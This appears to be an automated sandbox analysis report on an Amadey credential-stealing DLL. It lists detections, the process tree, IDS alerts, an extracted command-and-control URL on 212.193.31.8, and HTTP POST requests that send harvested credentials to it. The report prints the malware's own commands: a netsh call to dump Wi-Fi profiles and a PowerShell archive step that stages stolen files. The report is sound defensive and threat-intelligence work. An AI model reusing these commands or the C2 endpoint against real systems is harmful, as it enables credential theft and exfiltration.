Windows Analysis Report
cred64.dll.dll

Overview

General Information

Sample name: cred64.dll.dll
(renamed file extension from exe to dll)
Original sample name: cred64.dll.exe
Analysis ID: 1579621
MD5: d862c12a4467ebae581a8c0cc3ea2211
SHA1: 9e797375b9b4422b2314d3e372628643ccf1c5db
SHA256: 47f8a270b27c18bab9013f4a8f0ee6e877e4050bd4018d682eb502bcfd5bff6d
Tags: Amadey, dll, exe, user-abuse_ch

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey's stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6608 cmdline: loaddll64.exe "C:\Users\user\Desktop\cred64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6816 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 6868 cmdline: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 6960 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6276 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6836 cmdline: rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main MD5: EF3179D498793BF4234F708D3BE28633)
      • netsh.exe (PID: 6956 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7116 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 2588 cmdline: rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Save MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2836 cmdline: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Main MD5: EF3179D498793BF4234F708D3BE28633)
      • netsh.exe (PID: 7156 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4916 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 2920 cmdline: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Save MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

{"C2 url": "212.193.31.8/3ofn3jf3e2ljk2/index.php", "Version": "5.12"}

Source: cred64.dll.dll
Rule: JoeSecurity_Amadey_2
Description: Yara detected Amadey's stealer DLL
Author: Joe Security
Strings:

    System Summary

    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6868, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6276, ProcessName: powershell.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6868, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6276, ProcessName: powershell.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6868, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6276, ProcessName: powershell.exe

    Stealing of Sensitive Information

    Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6836, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 6956, ProcessName: netsh.exe
    Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-12-23T06:38:24.614773+0100  2856150  1         A Network Trojan was detected  192.168.2.4  49730        212.193.31.8    80                TCP
    2024-12-23T06:38:24.630041+0100  2856150  1         A Network Trojan was detected  192.168.2.4  49731        212.193.31.8    80                TCP
    2024-12-23T06:38:30.770706+0100  2856150  1         A Network Trojan was detected  192.168.2.4  49732        212.193.31.8    80                TCP

    Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-12-23T06:38:24.614773+0100  2855239  1         A Network Trojan was detected  192.168.2.4  49730        212.193.31.8    80                TCP
    2024-12-23T06:38:24.630041+0100  2855239  1         A Network Trojan was detected  192.168.2.4  49731        212.193.31.8    80                TCP
    2024-12-23T06:38:30.770706+0100  2855239  1         A Network Trojan was detected  192.168.2.4  49732        212.193.31.8    80                TCP

    AV Detection

    Source: cred64.dll.dllMalware Configuration Extractor: Amadey {"C2 url": "212.193.31.8/3ofn3jf3e2ljk2/index.php", "Version": "5.12"}
    Source: cred64.dll.dllReversingLabs: Detection: 36%
    Source: cred64.dll.dll Virustotal: Detection: 38%
    Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.3% probability
    Source: cred64.dll.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt+. source: powershell.exe, 00000011.00000002.2073544837.000001934FD1C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Automation.pdb source: powershell.exe, 00000015.00000002.2153748068.000001C321304000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000011.00000002.2070821730.000001934FCAE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2064588985.000001934FA40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2153160648.000001C32129C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: pdblib.pdb source: powershell.exe, 00000011.00000002.2064588985.000001934FA8B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.2072598626.000001934FCE3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdbz source: powershell.exe, 00000015.00000002.2153160648.000001C32129C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Target.pdbe35 source: powershell.exe, 00000011.00000002.2074774615.000001934FD68000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000015.00000002.2153748068.000001C3212F3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.dll
    Source: Binary string: softy.pdbvice source: powershell.exe, 00000011.00000002.2073544837.000001934FD1C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbk source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdbA56-E329-4D4D1%0# source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini

    Networking

    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49730 -> 212.193.31.8:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49731 -> 212.193.31.8:80
    Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.4:49730 -> 212.193.31.8:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49732 -> 212.193.31.8:80
    Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.4:49731 -> 212.193.31.8:80
    Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.4:49732 -> 212.193.31.8:80
    Source: C:\Windows\System32\rundll32.exe Network Connect: 212.193.31.8 80
    Source: Malware configuration extractorIPs: 212.193.31.8
    Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MzA4NA==Host: 212.193.31.8Content-Length: 3244Cache-Control: no-cache
    Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
    Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
    Source: unknownHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA51C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA51C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/%
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602CEB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602C68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA519C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA51E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1
    Source: rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1$
    Source: rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1?
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1art
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1d
    Source: rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1e=
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1n
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1q
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1s
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpg
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA519C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/Z
    Source: rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/a
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/lorer
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/nes
    Source: powershell.exe, 00000011.00000002.1991200108.0000019339295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.00000279018D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2038525364.0000027910071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000011.00000002.1991200108.0000019337BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000011.00000002.1991200108.00000193379C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3091B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000011.00000002.1991200108.0000019337BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000011.00000002.1991200108.00000193379C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3091B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000015.00000002.2036697236.000001C30A2E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30A4C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000011.00000002.1991200108.0000019338FEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.00000279014B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30A7DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000015.00000002.2036697236.000001C30AA84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000011.00000002.1991200108.0000019339295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.00000279018D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2038525364.0000027910071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winDLL@32/18@0/1
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
    Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\_Files_\
    Source: cred64.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\rundll32.exe File read: C:\Users\desktop.ini
    Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602C68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142EEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: cred64.dll.dllReversingLabs: Detection: 36%
    Source: cred64.dll.dllVirustotal: Detection: 38%
    Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\cred64.dll.dll"
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Save
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Main
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Save
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
